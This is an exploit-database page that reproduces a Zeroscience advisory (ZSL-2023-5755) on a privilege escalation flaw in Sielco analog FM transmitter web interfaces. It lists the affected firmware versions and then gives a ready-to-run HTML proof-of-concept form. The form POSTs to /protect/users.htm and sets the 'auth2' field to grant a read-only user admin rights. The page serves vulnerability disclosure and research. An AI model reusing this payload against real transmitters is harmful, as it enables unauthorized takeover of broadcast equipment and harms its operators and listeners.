Advertisement






Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation

CVE Category Price Severity
N/A CWE-119 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-04-15
CVSS EPSS EPSSP
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040059

Below is a copy:

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation
<!--

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.

Tested on: lwIP/2.1.1
           Web/3.0.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5755
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php


26.01.2023

-->


<html>
  <body>
    <form action="http://transmitter/protect/users.htm" method="POST">
      <input type="hidden" name="pwd0" value="" />
      <input type="hidden" name="pwd0bis" value="" />
      <input type="hidden" name="user1" value="" />
      <input type="hidden" name="pwd1" value="" />
      <input type="hidden" name="pwd1bis" value="" />
      <input type="hidden" name="auth1" value="" />
      <input type="hidden" name="user2" value="test" />
      <input type="hidden" name="pwd2" value="" />
      <input type="hidden" name="pwd2bis" value="" />
      <input type="hidden" name="auth2" value="2" />
      <input type="hidden" name="user3" value="" />
      <input type="hidden" name="pwd3" value="" />
      <input type="hidden" name="pwd3bis" value="" />
      <input type="hidden" name="auth3" value="" />
      <input type="submit" value="Escalate" />
    </form>
  </body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum